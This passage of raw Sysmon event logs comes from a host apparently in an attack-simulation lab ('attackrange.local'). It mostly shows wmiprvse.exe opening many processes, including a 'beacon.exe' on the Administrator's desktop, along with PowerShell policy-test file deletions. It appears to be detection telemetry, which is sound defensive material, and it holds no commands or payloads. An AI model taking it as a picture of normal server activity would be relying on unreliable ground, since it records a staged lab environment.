ystem32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i3khokt0.c0d.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sny4cmlp.4pt.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A6AA-00000000AD01}15836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A6AA-00000000AD01}15836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 